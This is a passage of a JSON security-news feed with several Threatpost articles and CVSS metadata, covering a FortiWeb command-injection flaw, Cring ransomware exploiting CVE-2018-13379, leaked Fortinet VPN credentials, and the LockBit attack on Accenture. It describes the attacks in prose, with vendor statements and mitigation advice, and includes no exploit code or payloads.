[CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. However, Rapid7 researchers identified less than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of the our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. \u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used for to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. ET with a statement from Fortinet.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T12:07:33", "type": "threatpost", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-18T12:07:33", "id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-08T21:27:05", "description": "Threat actors are exploiting a Fortinet vulnerability flagged by the feds last week that delivers a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\nResearchers say the attackers are exploiting an unpatched path-reversal flaw, tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>), in Fortinet\u2019s FortiOS. The goal is to gain access to victims enterprise networks and ultimately deliver ransomware, according to a [report by Kaspersky researchers published](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) this week.\n\n\u201cIn at least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted,\u201d Kaspersky senior security researcher Vyacheslav Kopeytsev wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nCring is relatively new to the ransomware threat landscape\u2014which already includes dominant strains [REvil](<https://threatpost.com/revil-claims-ransomware-attacks/164739/>), [Ryuk](<https://threatpost.com/ransomware-attack-spain-employment-agency/164703/>), [Maze and](<https://threatpost.com/maze-ransomware-cognizant/154957/>) [Conti](<https://threatpost.com/conti-40m-ransom-florida-school/165258/>). Cring was first [observed and reported](<https://id-ransomware.blogspot.com/2021/01/cring-ransomware.html>) by the researcher who goes by Amigo_A and Swisscom\u2019s CSIRT team in January. The ransomware is unique in that it uses two forms of encryption and destroys backup files in an effort to antagonize victims and prevent them from retrieving backup files without paying the ransom.\n\nLast week, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that nation-state advanced persistent threat (APT) groups were actively exploiting known security vulnerabilities in the Fortinet FortiOS operating system, affecting the company\u2019s SSL VPN products.\n\nOne of those bugs, is CVE-2018-13379, a path-traversal flaw in Fortinet FortiOS. The vulnerability is tied to system\u2019s SSL VPN web portal and allows an unauthenticated attacker to download system files of targeted systems via a specially crafted HTTP resource requests.\n\nIn its report Kaspersky echoed the feds\u2019 warning adding attackers are first scanning connections to Fortinet VPNs to see if the software used on the device is the vulnerable version. In the campaign researchers observed, threat actors follow an exploit chain, exploiting CVE-2018-13379 to launch a directory-traversal attack. The goal is to crack open affected hardware, give adversaries access to network credentials and to establish foothold in the targeted network, Kopeytsev explained.\n\n\u201cA directory-traversal attack allows an attacker to access system files on the Fortigate SSL VPN appliance,\u201d he wrote. \u201cSpecifically, an unauthenticated attacker can connect to the appliance through the internet and remotely access the file \u2018sslvpn_websession,\u2019 which contains the username and password stored in cleartext.\u201d\n\nFor it\u2019s part, \u201cthe security of our customers is our first priority,\u201d according to a statement from Fortinet provided to Threatpost. \u201cFor example, CVE-2018-13379 is an old vulnerability resolved in May 2019. Fortinet immediately issued a _[PSIRT advisory](<https://fortiguard.com/psirt/FG-IR-18-384> \"https://fortiguard.com/psirt/fg-ir-18-384\" )_ and communicated directly with customers and via corporate blog posts on multiple occasions in _[August 2019](<https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability> \"https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability\" )_ and _[July 2020 ](<https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws> \"https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws\" )_strongly recommending an upgrade. Upon resolution we have consistently communicated with customers as recently as late as 2020. If customers have not done so, we urge them to immediately implement the upgrade and mitigations.\u201d\n\n## **Anatomy of an Attack**\n\nOnce gaining access to the first system on the enterprise network, attackers use the Mimikatz utility to steal the account credentials of Windows users who had previously logged in to the compromised system, according to Kaspersky.\n\nIn this way, attackers compromised the domain administrator account, and then used [commodity tools](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>) like Cobalt Stroke backdoor and Powershell to propagate attacks across various systems on the network, according to the report.\n\nAfter gaining complete control, attackers download a cmd script to launch Cring ransomware, naming the malicious execution script \u201cKaspersky\u201d to disguise it as a security solution, Kopeytsev said.\n\nThe report breaks down how Cring achieves encryption and destroys existing backup files once it\u2019s launched on a system. First, the ransomware stops various services of two key programs on the network\u2014Veritas NetBackup and Microsoft SQL server.\n\nCring also halts the SstpSvc service, which is used to create VPN connections, which researchers surmised was to block any remediation effort by system administrators, Kopeytsev said.\n\n\u201cIt is most likely that the attackers, who at this stage controlled the infected system via Cobalt Strike, did this to make it impossible to connect to the infected system remotely via VPN,\u201d he wrote. \u201cThis was done to prevent system administrators from providing a timely response to the information security incident.\u201d\n\nCring proceeds by terminating other application processes in Microsoft Office and Oracle Database software to facilitate encryption as well as the removal of key backup files to prevent recovery of files, according to the report.\n\nIn its final step, Cring starts to encrypt files using strong encryption algorithms so victims can\u2019t decrypt files without knowing the RSA private key held by the attackers, Kopeytsev explained. First each file is encrypted using an AES encryption key and then that key is in turn encrypted using a 8,192-bit RSA public key hard-coded into the malicious program\u2019s executable file, he wrote.\n\nOnce encryption is complete, the malware drops a ransom note from attackers asking for two bitcoins (currently the equivalent of about $114,000) in exchange for the encryption key.\n\n## **Learning from Mistakes**\n\nThe report points out key mistakes made by network administrators in the attack observed by Kaspersky researchers in the hopes that other organizations can learn from them. First the attack highlights once again the importance of keeping systems updated with the latest patches, which could have avoided the incident altogether, Kopeytsev said.\n\n\u201cThe primary causes of the incident include the use of an outdated and vulnerable firmware version on the Fortigate VPN server (version 6.0.2 was used at the time of the attack), which enabled the attackers to exploit the CVE-2018-13379 vulnerability and gain access to the enterprise network,\u201d he wrote.\n\nSystem administrators also left themselves open to attack by not only running an antivirus (AV) system that was outdated, but also by disabling some components of AV that further reduced the level of protection, according to the report.\n\nKey errors in configuring privileges for domain policies and the parameteres of RDP access also came into play in the attack, basically giving attackers free rein once they entered the network, Kopeytsev observed.\n\n\u201cThere were no restrictions on access to different systems,\u201d he wrote. \u201cIn other words, all users were allowed to access all systems. Such settings help attackers to distribute malware on the enterprise network much more quickly, since successfully compromising just one user account provides them with access to numerous systems.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-08T14:00:32", "type": "threatpost", "title": "Hackers Exploit Fortinet Flaw in Sophisticated Cring Ransomware Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-08T14:00:32", "id": "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "href": "https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-10T13:33:05", "description": "Credentials pilfered from 87,000 unpatched Fortinet SSL-VPNs have been posted online, the company has [confirmed](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>).\n\nOr then again, maybe the number is far greater. On Wednesday, [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/>) reported that it\u2019s been in touch with a threat actor who leaked a list of nearly half a million Fortinet VPN credentials, allegedly scraped from exploitable devices last summer.\n\nThe news outlet has analyzed the file and reported that it contains VPN credentials for 498,908 users over 12,856 devices. BleepingComputer didn\u2019t test the credentials but said that all of the IP addresses check out as Fortinet VPN servers.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to analysis done by [Advanced Intel](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>), the IP addresses are for devices worldwide. As the chart below shows, there are 22,500 victimized entities located in 74 countries, with 2,959 of them being located in the US.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09180501/distribution-e1631225115765.jpg>)\n\nThe geographical distribution of the Fortinet VPN SSL list. Source: Advanced Intel.\n\nUPDATE: Threatpost reached out to Fortinet for clarification on how many devices were compromised. A spokesperson\u2019s reply reiterated the statement put out on Wednesday:\n\n\u201cThe security of our customers is our first priority. Fortinet is aware that a malicious actor has disclosed on a dark web forum, SSL-VPN credentials to access FortiGate SSL-VPN devices. The credentials were obtained from systems that have not yet implemented the patch update provided in May 2019. Since May 2019, Fortinet has continuously communicated with customers urging the implementation of mitigations, including corporate blog posts in [August 2019](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_fortios-2Dssl-2Dvulnerability&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=LGgVh3l8kre7r4f1ssl1_Kz9MXkRjaAznfUi1BMjzpc&e=>), [July 2020](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_atp-2D29-2Dtargets-2Dssl-2Dvpn-2Dflaws&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=F9W4tauf4zFHFuZbvTYHmF2Y2b_tHI0htVTpiF6kRwM&e=>), [April 2021](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_psirt-2Dblogs_patch-2Dvulnerability-2Dmanagement&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=m_k7PDQ0L4L0_OvdKQgGF5LkRVde6Q9EjgVXWtyg7sY&e=>) and [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>) For more information, please refer to our latest [blog](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) and [PSIRT](<https://www.fortiguard.com/psirt/FG-IR-18-384>) advisory. We strongly urge customers to implement both the patch upgrade and password reset as soon as possible.\u201d\n\n## A Creaky Old Bug Was Exploited\n\nOn Wednesday, the company confirmed that the attackers exploited [FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) / [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>): a path traversal weakness in Fortinet\u2019s FortiOS that was discovered in 2018 and which has been [repeatedly](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>), [persistently](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) [exploited](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) [since](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) then.\n\nUsing the leaked VPN credentials, attackers can perform data exfiltration, install malware and launch ransomware attacks.\n\nThe bug, which recently made it to the Cybersecurity and Infrastructure Security Agency\u2019s (CISA\u2019s) list of the [top 30 most-exploited flaws](<https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/>), lets an unauthenticated attacker use specially crafted HTTP resource requests in order to download system files under the SSL VPN web portal.\n\n[Fortinet fixed the glitch](<https://www.fortiguard.com/psirt/FG-IR-18-384>) in a May 2019 update (and has since then repeatedly urged customers to upgrade their devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above). But even if security teams patched their VPNs, if they didn\u2019t also reset the devices\u2019 passwords at the same time, the VPNs still might be vulnerable.\n\n## All in the Babuk Family\n\nAccording to BleepingComputer, a threat actor known as Orange \u2013 the administrator of the newly launched RAMP hacking forum and a previous operator of the Babuk ransomware operation \u2013 was behind the leak of Fortinet credentials.\n\nOrange, who reportedly split off from Babuk after gang members quarreled, is believed to now be in with the new Groove ransomware operation. On Tuesday, Orange created a post on the RAMP forum with a link to a file that allegedly contained thousands of Fortinet VPN accounts.\n\nAt the same time, a post promoting the Fortinet leak appeared on Groove\u2019s data leak site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09181910/Screen-Shot-2021-09-09-at-6.18.51-PM-e1631225999483.png>)\n\nGroove is a new ransomware gang that\u2019s been active just since last month. It favors the [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) model of combining data compromise with threats to publish seized data.\n\nAccording to a Wednesday[ post](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates>) co-authored by researchers from Intel471 and McAfee Enterprise Advanced Threat Research (ATR), with contributions from Coveware, McAfee Enterprise ATR said that it believes with high confidence that Groove is associated with the Babuk gang, either as a former affiliate or subgroup.\n\n## Chatting Up the Ransomware \u2018Artist\u2019\n\nOn Tuesday, one of the Groove gang\u2019s members decided to chat up [Advanced Intel researchers](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURfcd4v3FHxX6gbihrPKiOsKVZWKogo5F6F12wmaozsXKHpRn-2BuwOKhxsw08i8Jv-2FwvO5fMxaC-2Fte96Z6WZovyPDvgaoAv118tKwZ5rO8iwUDyyIWPDHnMoXBJtaLTD2RabFZrrydZEg6RqJoehkdLk-3DUm1f_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfxpBYaCF7SSTgcHUKKV76UPqxTA0p35WcvHO-2B-2FRJuzuH54khmPYQLlkSfPjUHNAEXmgG-2BAfkNgcNKoVR9B9stOpafLCBk3qkXifeCsD9qirBA0nFvpW7EKJZBqmyDuRJPZiat-2B-2BXYCIJyRqjlbli1cMzNiEtsWjfRjsB82fJ-2BuXkMJGLitr0yTHVhHoV-2B7vgARde73QCuABoV-2Fk8lDDaGpEQVoKiwlCAiZTq63zy5kUQ-3D>), to give them an insider\u2019s take on how the new ransomware syndicate was formed and how it recruits operators. That included \u201cthe \u2018truth\u2019 about the association of Babuk, [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [BlackMatter](<https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/>), and other insights on the inner relationships within the ransomware community,\u201d as researchers Yelisey Boguslavskiy and Anastasia Sentsova explained.\n\nAccording to their writeup, the Groove representative is likely a threat actor that goes by \u201cSongBird\u201d. The researchers described SongBird as a known character, being a former Babuk ransomware operator and creator of the RAMP forum \u2013 which was launched on July 11 and which caters to top ransomware operators plotting their attacks.\n\nThe screen capture below shows Advanced Intel\u2019s translation of SongBird\u2019s explanation of the platform: \u201cRAMP is the result of my year-long work of manipulation by top journalists and media such as Bloomberg and others. I spent quite some time to promote this domain and I am very proud for all of the work I did! I declare this forum is a work of art!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09183430/kitten-brag-e1631226887669.jpg>)\n\nAccording to Advanced Intel, RAMP was initially based on the former Babuk\u2019s data leak website domain but has since relocated to a new domain.\n\nSongBird was reportedly prompted to pull off their tell-all after the [disclosure of Babuk\u2019s source code](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>). The source code was uploaded to VirusTotal in July, making it available to all security vendors and competitors. At the time, it wasn\u2019t clear how it happened, though Advanced Intel said on Wednesday that the code release was done by an actor using the alias DY-2.\n\nThe code release had repercussions, Advanced Intel said. \u201cThe incident caused a massive backlash from the underground community which once again provoked the release of the blog by SongBird,\u201d according to the report.\n\nSongBird told the researchers that the actor wanted to address \u201cthe issue of constant misinformation and misreporting originating from the Twitter community covering the ransomware subject.\u201d\n\nThe actor denied any associations between DarkSide and BlackMatter, with the exception of both ransomware strains sharing the same source code: a circumstance that means the code \u201cmost likely has been purchased from one of the DarkSide affiliates,\u201d SongBird wrote.\n\n## How to Protect Your VPN\n\nYou can check Fortinet\u2019s advisory for a list of versions affected by the oft-exploited vulnerability that was at the heart of this credential scraping. Fortinet had the following recommendations for organizations that may have been running an affected version \u201cat any time\u201d:\n\n 1. Disable all VPNs (SSL-VPN or IPSEC) until the following remediation steps have been taken.\n 2. Immediately upgrade affected devices to the latest available release, as detailed below.\n 3. Treat all credentials as potentially compromised by performing an organization-wide password reset.\n 4. Implement multi-factor authentication, which will help mitigate the abuse of any compromised credentials, both now and in the future.\n 5. Notify users to explain the reason for the password reset and monitor services such as HIBP for your domain. There is the potential that if passwords have been reused for other accounts, they could be used in credential stuffing attacks.\n\nRajiv Pimplaskar, Veridium chief revenue officer, told Threatpost that the breach is \u201ca stark reminder of today\u2019s dangers with password-based systems. While enterprises and users are starting to adopt passwordless authentication methods like \u2018phone as a token\u2019 and FIDO2 for customer and Single Sign On (SSO) portals and enterprise applications, vulnerabilities still exist across entire categories of cases such as, 3rd party sites, VPN (Virtual Private Network) and VDI (Virtual Desktop Infrastructure) environments, all of which are particularly vulnerable in the current WFH explosion.\n\n\u201cCompanies need to adopt a more holistic modern authentication strategy that is identity provider agnostic and can operate across all use cases in order to build true resiliency and ensure cyber defense against such actors,\u201d he concluded.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T22:49:27", "type": "threatpost", "title": "Thousands of Fortinet VPN Account Credentials Leaked", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T22:49:27", "id": "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "href": "https://threatpost.com/thousands-of-fortinet-vpn-account-credentials-leaked/169348/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-13T13:06:12", "description": "081321 08:42 UPDATE: Accenture reportedly acknowledged in an internal memo that attackers stole client information and work materials in a July 30 \u201csecurity incident.\u201d\n\n[CyberScoop](<https://www.cyberscoop.com/accenture-ransomware-lockbit/>) reports that the memo downplays the impact of the ransomware attack. The outlet quoted Accenture\u2019s internal memo: \u201cWhile the perpetrators were able to acquire certain documents that reference a small number of clients and certain work materials we had prepared for clients, none of the information is of a highly sensitive nature,\u201d it reads. Threatpost has asked Accenture to comment on CyberScoop\u2019s report.\n\nEarlier this week, the LockBit ransomware-as-a-service (RaaS) gang published the name and logo of what has now been confirmed as one of its latest victims: Accenture, a global business consulting firm with an insider track on some of the world\u2019s biggest, most powerful companies.\n\nAccenture\u2019s clients include 91 of the Fortune Global 100 and more than three-quarters of the Fortune Global 500. According to its [2020 annual report;](<https://www.accenture.com/us-en/about/company/annual-report>) that includes e-commerce giant Alibaba, Cisco and Google. Valued at $44.3 billion, Accenture is one of the world\u2019s largest tech consultancy firms, and employs around 569,000 people across 50 countries.\n\nIn a post on its Dark Web site, LockBit offered up Accenture databases for sale, along with a requisite jab at what the gang deemed to be Accenture\u2019s pathetic security.\n\n> \u201cThese people are beyond privacy and security. I really hope that their services are better than what I saw as an insider. If you are interested in buying some databases, reach us.\u201d \n\u2014LockBit site post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11162046/LockBit-site-screengrab.png>)\n\nLockBit dark-web site screen capture. Source: Cybereason.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to [Security Affairs](<https://securityaffairs.co/wordpress/121048/data-breach/accenture-lockbit-2-0-ransomware-attack.html?utm_source=rss&utm_medium=rss&utm_campaign=accenture-lockbit-2-0-ransomware-attack>), at the end of a ransom payment clock\u2019s countdown, a leak site showed a folder named W1 that contained a collection of PDF documents allegedly stolen from the company. LockBit operators claimed to have gained access to Accenture\u2019s network and were preparing to leak files stolen from Accenture\u2019s servers at 17:30:00 GMT.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11174155/countdown-clock-e1628718131517.png>)\n\nLockBit countdown clock. Source: Cyble.\n\nThe news hit the headlines late Wednesday morning Eastern Time, after CNBC reporter Eamon Javers [tweeted](<https://twitter.com/EamonJavers/status/1425476619934838785>) about the gang\u2019s claim that it would be releasing data within coming hours and that it was offering to sell insider Accenture information to interested parties.\n\n> A hacker group using Lockbit Ransomware says they have hacked the consulting firm Accenture and will release data in several hours, CNBC has learned. They are also offering to sell insider Accenture information to interested parties.\n> \n> \u2014 Eamon Javers (@EamonJavers) [August 11, 2021](<https://twitter.com/EamonJavers/status/1425476619934838785?ref_src=twsrc%5Etfw>)\n\n## Blessed Be the Backups\n\nYes, we were hit, but we\u2019re A-OK now, Accenture confirmed: \u201cThrough our security controls and protocols, we identified irregular activity in one of our environments. We immediately contained the matter and isolated the affected servers,\u201d it said in a statement. \u201cWe fully restored our affected systems from backup, and there was no impact on Accenture\u2019s operations, or on our clients\u2019 systems.\u201d\n\nAccording to [BleepingComputer](<https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/>), the group that threatened to publish Accenture\u2019s data \u2013 allegedly stolen during a recent cyberattack \u2013 is known as LockBit 2.0.\n\nAs explained by Cybereason\u2019s Tony Bradley in a Wednesday [post](<https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware>), the LockBit gang is similar to its ransomware-as-a-service (RaaS) brethren DarkSide and REvil: Like those other operations. LockBit uses an affiliate model to rent out its ransomware platform, taking a cut of any ransom payments that result.\n\nBradley noted that the LockBit gang is apparently on a hiring spree in the wake of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [REvil](<https://threatpost.com/whats-next-revil-victims/167926/>) both shutting down operations.\n\n\u201cThe wallpaper displayed on compromised systems now includes text inviting insiders to help compromise systems \u2013 promising payouts of millions of dollars,\u201d Bradley wrote.\n\n## Insider Job?\n\nCyble researchers suggested in a [Tweet stream](<https://twitter.com/AuCyble/status/1425422006690881541>) that this could be an insider job. \u201cWe know #LockBit #threatactor has been hiring corporate employees to gain access to their targets\u2019 networks,\u201d the firm tweeted, along with a clock counting down how much time was left for Accenture to cough up the ransom.\n\n> Potential insider job? We know [#LockBit](<https://twitter.com/hashtag/LockBit?src=hash&ref_src=twsrc%5Etfw>) [#threatactor](<https://twitter.com/hashtag/threatactor?src=hash&ref_src=twsrc%5Etfw>) has been hiring corporate employees to gain access to their targets' 